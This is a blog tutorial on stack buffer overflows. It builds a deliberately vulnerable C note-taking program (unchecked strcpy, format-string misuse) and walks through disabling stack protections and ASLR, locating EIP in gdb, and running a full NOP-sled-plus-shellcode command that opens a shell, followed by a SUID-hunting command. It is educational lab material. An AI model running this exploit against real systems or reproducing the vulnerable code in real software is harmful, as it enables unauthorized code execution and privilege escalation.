Buffer overflows are as old as the world itself. Being a software engineer myself, I’ve always been interested in identifying weaknesses in code. In my early days, I also wrote a lot of C code. Buffer overflows were one of the first topics I really dug into because C is infamous for not being memory safe, and today is the day I’ll share it with the world.
Buffer overflow
Buffer overflow is a type of vulnerability that relates to memory allocation. Whenever we create a new array a fixed size buffer is allocated on the stack (stack being the part of our operating memory). Let’s create a buffer of a size 400 bytes (we can achieve this by creating a char array holding 400 elements) and visualize how the stack actually looks.
void createBuffer() {
char buffer[400];
}
int main() {
createBuffer();
}
In the memory the buffer will look like this:
At the top we can see the ESP register which points to the start of the stack. Then we have the buffer itself (the memory allocated in our createBuffer
function) followed by EBP (points to the bottom of the stack) and most importantly EIP (Extended Instruction Pointer) register which holds which contains the return address for the stack. In other words, it tells the computer where it should go next (essentially which instruction to run next). We would like to ideally rewrite the content of EIP register and let it point to our malicious code.
Note++ (Vulnerable app)
There is a brand new app named Note++ on the market. Using this program will enable you to take notes in entirely new ways. Unbeknownst to general public, it contains a major flaw which makes it quite vulnerable to exploiting. Can you find the security hole?
void createNote(char *note) {
char buffer[400];
strcpy(buffer, note);
FILE *f = fopen("note.txt", "w");
if (f != NULL) {
fprintf(f, buffer);
}
fclose(f);
}
int main(int argc, char* argv[]) {
if (argc == 2) {
createNote(argv[1]);
}
return 0;
}
The strcpy function, which copies note content to the buffer, is the section of code that raises certain red flags. The fact that strcpy()
does not verify the size of the input given is a problem with this function. The note would inevitably result in a buffer overflow with a potential segmentation fault if it were longer than 400 characters.
Buffer overflow protections
If you compile a C or C++ code using gcc compiler, there is (by default) some kind of a protection we have to disable:
- SC (Stack Canary) – secret value located somewhere in the stack. This value changes everytime we run a program. Before a function return, the value is checked and if it appears to be modified, the program exits.
- DEC (Data Execution Prevention) – protects the system from executing the code that is located in the memory space that should not contain executable instructions
- ASLR (Address Space Layout Randomization) – modifies the system so every time we run a program, it will be assigned a unique starting address
Disabling SC and DEC can be achieved by adding shutting off the stack protector during the compilation:
-fno-stack-protector -z execstack
If we want to temporarily disable ASLR (requires a user to be root), we can use this command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Where is Waldo? I mean… where is EIP?
Great! We already have a vulnerable application present within our system. The next step is to find the location of EIP because it doesn’t have to be located right after buffer and EBP. For this we can use GDB which is a debugger used mainly for C and C++ code. I will use Python for creating inputs that helps me map the stack. My goal is to send an input (payload) that would be of (buffer + EBP + EIP) length. If the input would have different length, the program would exit with Segmentation fault.
gdb -q --args ./noteplusplus `python -c 'print "A" * 412 + "BCDE"'`
After some testing, I have discovered that my buffer has the length of 416 bytes with the buffer and EBP taking 412 bytes and EIP occupying the last four bytes. The reason behind appending the string "BCDE"
is its hexadecimal representation. It translates to the values 42
, 43
, 44
and 45
that we can easily spot in the debugger. To better visualize the stack, you can use the x/32z $esp
command withing the debugger which will display the memory in the blocks of 32 bytes and it will also jump straight to the beginning of the stack (pointer ESP points to the top of the stack). Hit Enter key to keep scrolling until you will see a sequence of 0x41414141
which represents letters A. After some time, you should be able to see a single cell containing 0x45444342
value (in little endian, this value represents the BCDE string).
0xffffac50: 0x41414141 0x41414141 0x41414141 0x45444342
Shall we use Shellcodes?
In the previous example we have filled the stack with arbitrary values. What if we used some (perhaps harmful) instructions? The Shellcodes enter the picture at this point. Shellcode is a small piece of code (representing instructions) that is frequently used as a payload for exploitation. There is a large database of shellcodes used for educational purposes available at shell-storm.org. I am going to select the one that opens a shell.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
At the end of our shellcode we have to append the return address to a place in our stack. We would like the address to point at the beginning of the stack (address which you got by calling x/32z $esp
in the gdb). This return address written in the reverse order will rewrite the value in the EIP register.
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh + \50\x4\xff\xff
Setting up the attack string
We have all the necessary parts set up. The only thing remaining is to set up the attack string which will be passed as a parameter to our vulnerable application. To create an attack string, we have to do some calculations.
- We know that the buffer has the size of 412 bytes
- Our shellcode has 53 bytes
- 412 – 53 = 359 which means that we have to fill the buffer with 359 bytes of arbitrary nonsense
As the “arbitrary nonsense” we can use the NOP (No operation) instruction which has the hexadecimal value of 0x90
(for Intel 64bit architecture, it is different for other systems). With this knowledge we can call our program like this:
./noteplusplus `python -c 'print "\x90" * 359 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\50\x4\xff\xff'"`
And open a shell using the vulnerable Note++ application.
Mismanaged SUID can lead to troubles
Sometimes lousy system administrators compiles applications whilst being logged to their root profile. This might result in unknowingly setting SUID (Set-user identification) to the root as well. This indicates that the shell will be launched as an administrator and the program will have root permissions. You can find all the executables with a root level privilage by running this command:
find / -perm -u=s -type f 2>/dev/null
Argument 2>/dev/null
disposes of the errors gathered during system search.
Is this still viable?
Well, buffer overflow is an introductory type of exploit and was mostly used in the past. It is however useful to have the understanding of this topic as it paves the way to learning more advanced exploits. I also believe each and every programmer should have the understanding of how the memory works.
If you have read so far, you might want to follow me here on Hashnode. Feel free to connect with me over at LinkedIn or Mastodon.